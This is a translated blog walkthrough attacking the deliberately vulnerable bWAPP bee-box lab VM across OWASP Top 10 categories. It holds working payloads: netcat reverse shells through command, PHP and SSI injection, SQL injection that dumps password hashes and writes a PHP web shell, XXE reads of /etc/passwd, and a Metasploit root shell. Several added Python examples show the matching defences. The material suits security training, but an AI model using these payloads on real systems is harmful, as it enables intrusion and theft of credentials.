Introduction
VM download: https://www.vulnhub.com/entry/bwapp-bee-box-v16,53/
If you want to deploy the environment yourself: https://sourceforge.net/projects/bwapp/files/bee-box/
bWAPP contains more than 100 vulnerabilities, including the OWASP Top 10 risks; a very satisfying PHP web target machine.
Login username: bee, password: bug. The vulnerability level can be raised to increase difficulty: low -> medium -> high.
For details, consult the related documentation. Now let's happily take down the little bee.
0x001 Reconnaissance
Whatever else, we still have to recon this VM. Basic routine: pull out Nmap and give it a quick scan.
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 45:a4:66:ec:3a:ba:97:f8:3e:1a:ba:1c:24:68:22:e8 (DSA)
|_ 2048 63:e7:c5:d1:8d:8a:94:02:36:6a:d7:d2:75:e9:8b:ce (RSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: bee-box, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
|_ SSL2_RC4_128_WITH_MD5
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: ITSECGAMES)
443/tcp open ssl/https?
|_ssl-date: 2018-11-07T10:27:37+00:00; -26d19h25m00s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
|_ SSL2_RC4_128_WITH_MD5
445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: ITSECGAMES)
512/tcp open exec?
513/tcp open login?
514/tcp open shell?
666/tcp open doom?
| fingerprint-strings:
| GenericLines, beast2:
| *** bWAPP Movie Service ***
|_ Matching movies: 0
3306/tcp open mysql?
|_mysql-info: ERROR: Script execution failed (use -d to debug)
5901/tcp open vnc VNC (protocol 3.8)
| vnc-info:
| Protocol version: 3.8
| Security types:
|_ VNC Authentication (2)
6001/tcp open X11 (access denied)
8080/tcp open http nginx 1.4.0
|_http-server-header: nginx/1.4.0
|_http-title: Site doesn't have a title (text/html).
8443/tcp open ssl/https-alt nginx/1.4.0
|_http-server-header: nginx/1.4.0
|_http-title: 400 The plain HTTP request was sent to HTTPS port
|_ssl-date: 2018-11-07T10:27:37+00:00; -26d19h25m00s from scanner time.
| tls-nextprotoneg:
|_ http/1.1
9080/tcp open http lighttpd 1.4.19
|_http-server-header: lighttpd/1.4.19
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: F4:B7:E2:01:6D:06 (Hon Hai Precision Ind.)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.13 - 2.6.32
Network Distance: 1 hop
Service Info: Host: bee-box; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -26d19h39m59s, deviation: 29m59s, median: -26d19h25m00s
|_nbstat: NetBIOS name: BEE-BOX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Unix (Samba 3.0.28a)
| Computer name: bee-box
| NetBIOS computer name:
| Domain name:
| FQDN: bee-box
|_ System time: 2018-11-07T11:27:32+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
With a basic understanding in hand, let's start practising the vulnerabilities.
0x002 A1 Injection
1.HTML Injection – Reflected (GET)
To check whether the form uses GET or POST, open the browser, press F12, and search the page source for "First name:". To replay the data conveniently, use Burp Suite.
<form action="/bWAPP/htmli_get.php" method="GET">
Injection of an HTML <a> tag: <a href=http://www.baidu.com>点此领取奖励</a>
<a href=http://www.baidu.com>点此领取奖励</a> #low
<script>alert(document.cookie)</script> #JS cookie theft; you can extend this idea in many directions, all roads lead to Rome
At medium level the injection no longer works, so try URL-encoding the payload. High level still cannot be bypassed; I am not very familiar with PHP.
<a href=http://www.baidu.com>点此领取奖励</a>
#URL-encode it
%3Ca%20href%3Dhttp%3A%2F%2Fwww.baidu.com%3E%E7%82%B9%E6%AD%A4%E9%A2%86%E5%8F%96%E5%A5%96%E5%8A%B1%3C%2Fa%3E
2.HTML Injection – Reflected (POST)
<a href=http://www.baidu.com>点此领取奖励</a> #low
%3Ca%20href%3Dhttp%3A%2F%2Fwww.baidu.com%3E%E7%82%B9%E6%AD%A4%E9%A2%86%E5%8F%96%E5%A5%96%E5%8A%B1%3C%2Fa%3E #medium
For high, the only cheat left is to tamper with the request data.... utterly shameless, ahhh!!!
POST /bWAPP/htmli_post.php HTTP/1.1
Host: 192.168.1.104
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.104/bWAPP/htmli_post.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 358
Cookie: PHPSESSID=f4fdf1cde23c464faf2f2d13c926dcf2; security_level=2 #change to 1 or 0
Connection: close
Upgrade-Insecure-Requests: 1
firstname=%253Ca%2520href%253Dhttp%253A%252F%252Fwww.baidu.com%253E%25E7%2582%25B9%25E6%25AD%25A4%25E9%25A2%2586%25E5%258F%2596%25E5%25A5%2596%25E5%258A%25B1%253C%252Fa%253E&lastname=%253Ca%2520href%253Dhttp%253A%252F%252Fwww.baidu.com%253E%25E7%2582%25B9%25E6%25AD%25A4%25E9%25A2%2586%25E5%258F%2596%25E5%25A5%2596%25E5%258A%25B1%253C%252Fa%253E&form=submit
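Why the URL-encoded payload gets through at medium while the plain one does not, as an added example (not from the original post or from bWAPP's source): the filter modelled here replaces angle brackets and then URL-decodes, an ordering assumed from the behaviour observed in sections 1 and 2; the hardened version finishes decoding before escaping at output. PLAIN and ENCODED are constructed test inputs (the link text is replaced with ASCII).

```python
import html
from urllib.parse import unquote

# Constructed test inputs. PLAIN is the walkthrough's <a> payload with ASCII
# link text; ENCODED is the same string URL-encoded once, i.e. what the filter
# sees when the client sends it encoded twice and the web server decodes once.
PLAIN = "<a href=http://www.baidu.com>click</a>"
ENCODED = "%3Ca%20href%3Dhttp%3A%2F%2Fwww.baidu.com%3Eclick%3C%2Fa%3E"


def medium_filter(data: str) -> str:
    """Assumed reconstruction of the 'medium' behaviour observed above:
    replace the angle brackets first, then URL-decode.  The ordering is the
    bug: decoding happens after the check, so %3C and %3E turn back into
    '<' and '>' that the replacement step never saw."""
    data = data.replace("<", "&lt;").replace(">", "&gt;")
    return unquote(data)


def hardened_filter(data: str) -> str:
    """Correct ordering: finish all decoding before escaping, and escape at
    the point of output with quotes included so attribute contexts are
    covered too.  (Better still is not to URL-decode a second time at all;
    the web server has already decoded the request once.)"""
    return html.escape(unquote(data), quote=True)


def renders_markup(out: str) -> bool:
    """True if the filtered string still contains a live tag."""
    return "<" in out and ">" in out


if __name__ == "__main__":
    for label, payload in (("plain", PLAIN), ("encoded", ENCODED)):
        print(f"{label:8} medium   -> live tag: {renders_markup(medium_filter(payload))}")
        print(f"{label:8} hardened -> live tag: {renders_markup(hardened_filter(payload))}")
```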
3.HTML Injection – Reflected (URL)
#low the reflected URL can be modified arbitrarily
GET /bWAPP/htmli_current_url.php#<script>alert(document.cookie)</script> HTTP/1.1
Host: 192.168.1.104 #the IP address can be modified arbitrarily
4.HTML Injection – Stored (Blog)
<a href=http://www.baidu.com>点此领取奖励</a> #low arbitrary code can be written in and executed
#forged login form
<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:white; padding: 1em;">Please login with valid credentials:<br><form name="login" action="http://192.168.1.101/login.htm"><table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td><td><input type="text" name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr></table></form></div>
5.iFrame Injection
#low
ParamUrl=https://www.baidu.com&ParamWidth=1000&ParamHeight=1000
ParamUrl=robots.txt" onload="alert(document.cookie)
"></iframe><script>alert(document.cookie);</script>
6.LDAP Connection Settings
#not configured; you need to set it up yourself
sudo apt-get install slapd ldap-utils
sudo apt-get install phpLDAPadmin #install the web UI
clear=* #injection
7.Mail Header Injection (SMTP)
test@domain.com%0ACc:test@domain.com,%0ABcc:test@domain.com
8.OS Command Injection
#low
; whoami
www.nsa.gov && nc -vn 192.168.1.101 4444 -e /bin/bash
#listener
nc -lvp 4444
listening on [any] 4444 ...
192.168.1.104: inverse host lookup failed: Unknown host
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.104] 51213
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
#medium
www.nsa.gov | nc -vn 192.168.1.101 4444 -e /bin/bash
At high level it is hard to bypass by hand, so bring in a tool; why go to all that trouble, just hit it directly.
commix --url="http://192.168.1.104/bWAPP/commandi.php" --cookie="security_level=2; PHPSESSID=4a7c070b665d8d0db8ce2b02941a6a0c" --data=target="192.168.1.101&form=submit"
9.OS Command Injection – Blind
#low
127.0.0.1 && nc -vn 192.168.1.101 4444 -e /bin/bash
#high just use commix
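A defender-side counterpart to the command injection in sections 8 and 9, added here and not part of the original walkthrough: the lookup target is validated as a hostname or IP literal and handed to subprocess without a shell, so the `;`, `&&` and `|` separators shown above never reach a command interpreter. Using `nslookup` as the backing command is an assumption.

```python
import ipaddress
import re
import subprocess

# One DNS label: 1-63 chars of letters, digits or hyphens, not starting or
# ending with a hyphen.  Nothing a shell treats specially can match.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def is_valid_target(target: str) -> bool:
    """Allowlist check: accept an IPv4/IPv6 literal or a well-formed hostname.
    The separators used in the walkthrough (';', '&&', '|') and the space
    before them can never pass, so injection is rejected by construction
    rather than by trying to blacklist metacharacters."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        pass
    if not 1 <= len(target) <= 253:
        return False
    labels = target.rstrip(".").split(".")
    return all(_LABEL.match(label) for label in labels)


def vulnerable_command(target: str) -> str:
    """The pattern that makes commandi.php injectable: user input is glued
    into one string that a shell parses, so '; whoami' becomes a second
    command.  Listed only for contrast; never execute this."""
    return "nslookup " + target


def safe_argv(target: str) -> list:
    """Validate, then build an argv list for subprocess with shell=False.
    With a list and no shell, separators have no meaning even if the
    allowlist above were loosened later (defence in depth)."""
    if not is_valid_target(target):
        raise ValueError(f"rejected lookup target: {target!r}")
    return ["nslookup", target]  # assumed backing command


def run_lookup(target: str, timeout: float = 5.0) -> str:
    """Run the lookup with no shell involved.  Needs network access and the
    nslookup binary, so the demo below only exercises the validation."""
    proc = subprocess.run(safe_argv(target), capture_output=True,
                          text=True, timeout=timeout, check=False)
    return proc.stdout


if __name__ == "__main__":
    samples = [
        "www.nsa.gov",
        "127.0.0.1",
        "; whoami",
        "www.nsa.gov && nc -vn 192.168.1.101 4444 -e /bin/bash",
        "www.nsa.gov | nc -vn 192.168.1.101 4444 -e /bin/bash",
    ]
    for s in samples:
        verdict = "allowed " if is_valid_target(s) else "rejected"
        print(f"{verdict} {s!r}")
```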
10.PHP Code Injection
#low
phpi.php?message=test;phpinfo()
message=test;system('nc -vn 192.168.1.101 4444 -e /bin/bash')
#You can also run wget http:// to download a web shell and get a shell directly; this is stealthier than the Swiss-army-knife (nc) reverse shell
11.Server-Side Includes (SSI) Injection
#low
<!--#exec cmd="nc 192.168.1.101 4444 -e /bin/bash" -->
#receiver
nc -nlvp 4444
12.SQL Injection (GET/Search)
#low
sqli_1.php?title='+'&action=search
Iron Man' or 1=1 #
sqli_1.php?title=Iron+Man'+order+by+7+--+-&action=search
Iron Man' union select 1,2,3,4,5,6,7 #
iron' union select 1,user(),@@version,4,5,6,7 #
iron' union select 1,login,password,email,5,6,7 from users #
#the obtained password hash can then be cracked
john --format:raw-sha1 /root/password.txt --show
?:bug
1 password hash cracked, 0 left
iron' union select 1,"<?php echo shell_exec($_GET['cmd'])?>",3,4,5,6,7 into OUTFILE
'/var/www/bWAPP/tmp.php' #
13.SQL Injection (GET/Select)
movie=1 union select 1,2,3,4,5,6,7#&action=go
movie=67 union select 1,login,3,email,password,6,7 from users#&action=go
14.SQL Injection (POST/Search)
POST submission works the same way, just with the parameters in the body.
AJAX, simply put: the query fires as soon as you enter the parameter, and the injection follows the same logic as GET/POST.
AJAX comes in synchronous and asynchronous forms.
' '
1' union select 1,2,3,4,5,6,7#
1' union select 1,login,3,email,password,6,7 from users#
15.SQL Injection – Stored (XML)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE copyright [<!ENTITY test SYSTEM "file:///etc//passwd">]>
<rest>
<login>&test;</login>
<secret>login</secret>
</rest>
#view the data in Burp
SqlMap: dumping the database
sqlmap -u "http://192.168.1.104/bWAPP/sqli_1.php?title=1&action=search" --cookie="PHPSESSID=3e647cdf53c2a782805bebd9fa1c5a3c; security_level=0" --dbs
available databases [4]:
[*] bWAPP
[*] drupageddon
[*] information_schema
[*] mysql
--current-db
[20:39:37] [INFO] fetching current database
[20:39:37] [INFO] retrieved: bWAPP
current database: 'bWAPP'
--current-user
[20:41:07] [INFO] fetching current user
[20:41:07] [INFO] retrieved: root@localhost
current user: 'root@localhost'
--users
database management system users [7]:
[*] ''@'bee-box'
[*] ''@'localhost'
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'bee-box'
[*] 'root'@'localhost'
--passwords
cracked password 'bug' for user 'root' #stopped it here, didn't let it keep running
-D bWAPP --tables
[20:46:22] [INFO] fetching tables for database: 'bWAPP'
[20:46:23] [INFO] used SQL query returns 5 entries
[20:46:23] [INFO] retrieved: blog
[20:46:23] [INFO] retrieved: heroes
[20:46:23] [INFO] retrieved: movies
[20:46:23] [INFO] retrieved: users
[20:46:23] [INFO] retrieved: visitors
Database: bWAPP
[5 tables]
+----------+
| blog |
| heroes |
| movies |
| users |
| visitors |
+----------+
-D bWAPP -T users --columns
Database: bWAPP
Table: users
[9 columns]
+-----------------+--------------+
| Column | Type |
+-----------------+--------------+
| activated | tinyint(1) |
| activation_code | varchar(100) |
| admin | tinyint(1) |
| email | varchar(100) |
| id | int(10) |
| login | varchar(100) |
| password | varchar(100) |
| reset_code | varchar(100) |
| secret | varchar(100) |
+-----------------+--------------+
-D bWAPP -T users -C password --dump
Database: bWAPP
Table: users
[2 entries]
+------------------------------------------------+
| password |
+------------------------------------------------+
| 6885858486f31043e5839c735d99457f045affd0 (bug) |
| 6885858486f31043e5839c735d99457f045affd0 (bug) |
+------------------------------------------------+
--dump-all #dump the whole database
#Cracking passwords locally takes too long; you can hand the job to a server.
0x003. A2 – Broken Auth. & Session Mgmt
1.Broken Auth. – CAPTCHA Bypassing
#use Burp Intruder for brute-force cracking
login=§test§&password=§123456§&captcha_user=zq9mso&form=submit
2.Broken Auth. – Forgotten Function
email=§12312414%40163.com§&action=forgot #enumerate valid emails
3.Session Mgmt. – Administrative Portals
admin=1
4.Session Mgmt. – Cookies (Secure)
security_level=0; top_security=no<script>alert(1)</script>
Connection: close
5.Session Mgmt. – Session ID in URL
smgmt_sessionid_url.php?PHPSESSID=3e647cdf53c2a782805bebd9fa1c5a3c
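The security_level cookie is edited by hand throughout this walkthrough (the POST request in A1 section 2, the commix and sqlmap cookies). As an added example, not from the original post or from bWAPP, this shows how a server can detect such tampering by signing cookie values with HMAC-SHA256 and falling back to the strictest level when the tag does not verify; SERVER_KEY and the `value.tag` cookie format are constructed. Keeping the level in server-side session state rather than in a cookie at all is the stronger fix.

```python
import hashlib
import hmac
import secrets

# Constructed server-side key; a real deployment loads it from configuration
# and never ships it to the client.
SERVER_KEY = secrets.token_bytes(32)

STRICTEST_LEVEL = 2  # fail closed: unknown or tampered -> high


def sign_cookie(name: str, value: str, key: bytes = SERVER_KEY) -> str:
    """Return '<value>.<hex tag>' where tag = HMAC-SHA256(key, name '=' value).
    Binding the cookie name into the MAC stops a signed value being moved
    from one cookie to another."""
    tag = hmac.new(key, f"{name}={value}".encode(), hashlib.sha256).hexdigest()
    return f"{value}.{tag}"


def verify_cookie(name: str, signed: str, key: bytes = SERVER_KEY):
    """Return the value if the tag verifies, otherwise None.
    hmac.compare_digest keeps the comparison constant-time."""
    value, sep, tag = signed.rpartition(".")
    if not sep:
        return None  # unsigned value, e.g. a hand-edited 'security_level=0'
    expected = hmac.new(key, f"{name}={value}".encode(), hashlib.sha256).hexdigest()
    return value if hmac.compare_digest(tag.encode(), expected.encode()) else None


def parse_cookie_header(header: str) -> dict:
    """Split a 'Cookie:' header value into a name -> value dict."""
    cookies = {}
    for part in header.split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            cookies[name] = value
    return cookies


def effective_security_level(cookie_header: str, key: bytes = SERVER_KEY) -> int:
    """Decide which level the server honours for this request.  A missing,
    unsigned or tampered security_level falls back to the strictest level
    instead of the weakest, the opposite of the 'change the cookie to
    1 or 0' trick used in the walkthrough."""
    signed = parse_cookie_header(cookie_header).get("security_level", "")
    level = verify_cookie("security_level", signed, key)
    return int(level) if level in ("0", "1", "2") else STRICTEST_LEVEL


if __name__ == "__main__":
    good = sign_cookie("security_level", "2")
    forged = "0." + good.split(".", 1)[1]  # keep the tag, change the value
    print("honest  :", effective_security_level(f"PHPSESSID=abc; security_level={good}"))
    print("forged  :", effective_security_level(f"PHPSESSID=abc; security_level={forged}"))
    print("unsigned:", effective_security_level("PHPSESSID=abc; security_level=0"))
```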
0x004. A3 – Cross-Site Scripting (XSS)
1.XSS – Reflected (GET) (POST)
<script>alert(document.cookie)</script>
2.XSS – Reflected (JSON)
<svg onload=prompt(0)>
3.XSS – Reflected (AJAX/JSON)
<img src=1 onerror=alert(1) />
4.XSS – Reflected (Back Button)
Referer: ';alert(1);'
5.XSS – Reflected (Custom Header)
bWAPP: <script>alert(1)</script>
6.XSS – Reflected (Eval)
date=alert(1)
7.XSS – Reflected (HREF)
Referer: <script>alert(1)</script>
8.XSS – Reflected (User-Agent)
User-Agent: <script>alert(1)</script>
0x005. A4 – Insecure Direct Object References
1.Insecure DOR (Change Secret)
secret=1&login=test&action=change
2.Insecure DOR (Reset Secret)
<reset><login>bee</login><secret>Any bugs?</secret></reset> #modify arbitrarily
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE copyright [<!ENTITY test SYSTEM "file:///etc//passwd">]>
<rest>
<login>&test;</login>
<secret>login</secret>
</rest>
3.Insecure DOR (Order Tickets)
ticket_quantity=1&ticket_price=15&action=order #modify the hidden field
#Many bugs come from prices that are not obfuscated at all; even when they are, you can still test with decimal values.
0x006. A5 – Security Misconfiguration
1.Arbitrary File Access (Samba)
msf exploit(unix/misc/distcc_exec) > set rhost 192.168.1.104
rhost => 192.168.1.104
msf exploit(unix/misc/distcc_exec) > exploit
[*] Started reverse TCP double handler on 192.168.1.101:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo vbyqH8dKW4KUZQNS;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "vbyqH8dKW4KUZQNS\r\n"
[*] Matching...
[*] B is input...
id
uid=0(root) gid=0(root) groups=0(root)
Enumerate with enum4linux
#detailed usage: https://labs.portcullis.co.uk/tools/enum4linux/
enum4linux -S 192.168.1.104 #you can also pass just the IP for full information gathering
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Dec 7 17:43:26 2018
==========================
| Target Information |
==========================
Target ........... 192.168.1.104
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=====================================================
| Enumerating Workgroup/Domain on 192.168.1.104 |
=====================================================
[+] Got domain/workgroup name: ITSECGAMES
======================================
| Session Check on 192.168.1.104 |
======================================
[+] Server 192.168.1.104 allows sessions using username '', password ''
============================================
| Getting domain SID for 192.168.1.104 |
============================================
Domain Name: ITSECGAMES
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
==========================================
| Share Enumeration on 192.168.1.104 |
==========================================
Sharename Type Comment
--------- ---- -------
IPC$ IPC IPC Service (bee-box server (Samba 3.0.28a))
opt Disk
tmp Disk oh noes!
print$ Disk Printer Drivers
Xerox_Phaser_8500DN_PS:7 Printer Xerox Phaser 8500DN PS
Snagit_9:6 Printer Snagit 9
Send_To_OneNote_2010:8 Printer Send To OneNote 2010
PDF Printer PDF
Microsoft_XPS_Document_Writer:1 Printer Microsoft XPS Document Writer
HP_Officejet_6500_E710a-f_(Network):5 Printer HP Officejet 6500 E710a-f (Network)
Fax_-_HP_Officejet_6500_E710a-f_(Network):4 Printer Fax - HP Officejet 6500 E710a-f (Network)
Fax:2 Printer Fax
CutePDF_Writer:3 Printer CutePDF Writer
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
ITSECGAMES BEE-BOX
WORKGROUP FREE
[+] Attempting to map shares on 192.168.1.104
//192.168.1.104/IPC$ [E] Can't understand response:
NT_STATUS_NETWORK_ACCESS_DENIED listing \*
//192.168.1.104/opt Mapping: DENIED, Listing: N/A
//192.168.1.104/tmp Mapping: OK, Listing: OK
//192.168.1.104/print$ Mapping: DENIED, Listing: N/A
//192.168.1.104/Xerox_Phaser_8500DN_PS:7 Mapping: DENIED, Listing: N/A
//192.168.1.104/Snagit_9:6 Mapping: DENIED, Listing: N/A
//192.168.1.104/Send_To_OneNote_2010:8 Mapping: DENIED, Listing: N/A
//192.168.1.104/PDF Mapping: DENIED, Listing: N/A
//192.168.1.104/Microsoft_XPS_Document_Writer:1 Mapping: DENIED, Listing: N/A
//192.168.1.104/HP_Officejet_6500_E710a-f_(Network):5 Mapping: DENIED, Listing: N/A
//192.168.1.104/Fax_-_HP_Officejet_6500_E710a-f_(Network):4 Mapping: DENIED, Listing: N/A
//192.168.1.104/Fax:2 Mapping: DENIED, Listing: N/A
//192.168.1.104/CutePDF_Writer:3 Mapping: DENIED, Listing: N/A
enum4linux complete on Fri Dec 7 17:43:27 2018
smbclient -L 192.168.1.104
Enter WORKGROUP\root's password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
IPC$ IPC IPC Service (bee-box server (Samba 3.0.28a))
opt Disk
tmp Disk oh noes!
print$ Disk Printer Drivers
Xerox_Phaser_8500DN_PS:7 Printer Xerox Phaser 8500DN PS
Snagit_9:6 Printer Snagit 9
Send_To_OneNote_2010:8 Printer Send To OneNote 2010
PDF Printer PDF
Microsoft_XPS_Document_Writer:1 Printer Microsoft XPS Document Writer
HP_Officejet_6500_E710a-f_(Network):5 Printer HP Officejet 6500 E710a-f (Network)
Fax_-_HP_Officejet_6500_E710a-f_(Network):4 Printer Fax - HP Officejet 6500 E710a-f (Network)
Fax:2 Printer Fax
CutePDF_Writer:3 Printer CutePDF Writer
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful
Server Comment
--------- -------
Workgroup Master
--------- -------
ITSECGAMES BEE-BOX
Upload a file
smbclient \\\\192.168.1.104\\tmp -c "put test"
0x007
1.HTML5 Web Storage (Secret)
if(typeof(Storage) !== "undefined")
{
localStorage.login = "bee";
localStorage.secret = "1";
alert(localStorage.login);
alert(localStorage.secret);
}
2.Directory Traversal – Directories
?directory=../../../../var/www/
3.Directory Traversal – Files
?page=../../../../../etc/passwd
4.Host Header Attack (Cache Poisoning)
GET /bWAPP/hostheader_1.php HTTP/1.1
Host: www.baidu.com
5.Remote & Local File Inclusion (RFI/LFI)
?language=../../../../etc/passwd&action=go
?language=http://www.baidu.com
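Hardening for the traversal and inclusion parameters in sections 2, 3 and 5 (?directory=, ?page=, ?language=), as an added example that is not from the original post or from bWAPP: a URL-scheme check rejects remote includes, an allowlist names the only files that may be included, and a containment check on the normalised path stops `../` sequences. WEB_ROOT, LANG_DIR, DOCS_DIR and ALLOWED_LANGS are constructed.

```python
import posixpath
from urllib.parse import urlsplit

# Constructed layout; bWAPP's real include paths are not assumed here.
WEB_ROOT = "/var/www/bWAPP"
LANG_DIR = posixpath.join(WEB_ROOT, "lang")
DOCS_DIR = posixpath.join(WEB_ROOT, "documents")
ALLOWED_LANGS = {"lang_en.php", "lang_fr.php", "lang_nl.php"}


def safe_join(base: str, user_path: str) -> str:
    """Join user_path under base and confirm the normalised result is still
    inside base.  Raises ValueError for '../' escapes and absolute paths.
    Containment is checked on the normalised string, so
    '../../../../etc/passwd' collapses to '/etc/passwd' and fails."""
    if user_path.startswith("/"):
        raise ValueError("absolute path rejected: " + user_path)
    full = posixpath.normpath(posixpath.join(base, user_path))
    if posixpath.commonpath([base, full]) != base:
        raise ValueError("path escapes base directory: " + full)
    return full


def resolve_include(language: str) -> str:
    """Map the ?language= parameter to a file, or raise ValueError.
      1. any URL scheme (http://, ftp://, php:// wrappers ...) is a remote
         include attempt and is rejected outright;
      2. the name must be on the allowlist, the control that matters most;
      3. safe_join re-checks containment as defence in depth."""
    if urlsplit(language).scheme:
        raise ValueError("remote include rejected: " + language)
    if language not in ALLOWED_LANGS:
        raise ValueError("not an allowed language file: " + language)
    return safe_join(LANG_DIR, language)


if __name__ == "__main__":
    probes = [
        ("language", "lang_en.php"),
        ("language", "../../../../etc/passwd"),
        ("language", "http://www.baidu.com"),
        ("language", "images/shelltmp.php.png"),
        ("directory", "../../../../var/www/"),
    ]
    for param, value in probes:
        try:
            path = resolve_include(value) if param == "language" else safe_join(DOCS_DIR, value)
            print(f"{param}={value!r:32} -> {path}")
        except ValueError as exc:
            print(f"{param}={value!r:32} -> rejected ({exc})")
```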
6.Restrict Device Access
Mozilla/5.0(iPhone;U;CPUiPhoneOS4_0likeMacOSX;en-us)AppleWebKit/532.9(KHTML,likeGecko) Version/4.0.5Mobile/8A293Safari/6531.22.7
7.XML External Entity Attacks (XXE)
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY popped SYSTEM "file:///etc/passwd">
]>
<reset><login>&popped;</login><secret>Any bugs?</secret></reset>
8.CSRF (Change Password)
?password_new=123&password_conf=123&action=change
9.PHP Eval Function
php_eval.php?eval=echo shell_exec("cat /etc/passwd");
10.Unrestricted File Upload
#low
weevely generate 123456 shell.php
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -e php/base64 -f raw > shelltmp.php
#high
Remote & Local File Inclusion (RFI/LFI)
rlfi.php?language=images/shelltmp.php.png
Summary:
I only did black-box testing on this target and did not analyse the source. I have not studied PHP much and am still rather lazy about it. I used Kali Linux tools for the penetration test; tool scans produce false positives and miss many vulnerabilities. Tools are only an aid: findings still need manual re-verification, and the underlying principles need further study and practice.
Published by: 全栈程序员-用户IM. Reprints must credit the source: https://javaforall.cn/190140.html Original link: https://javaforall.cn